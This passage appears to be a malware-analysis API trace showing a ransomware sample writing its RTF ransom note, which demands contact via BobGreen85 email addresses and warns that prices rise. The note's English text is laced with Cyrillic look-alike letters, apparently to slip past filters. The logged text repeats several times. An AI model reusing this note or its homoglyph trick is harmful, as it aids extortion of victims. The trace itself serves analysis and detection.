ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0064.552] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x2863a28, cbMultiByte=7247, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in 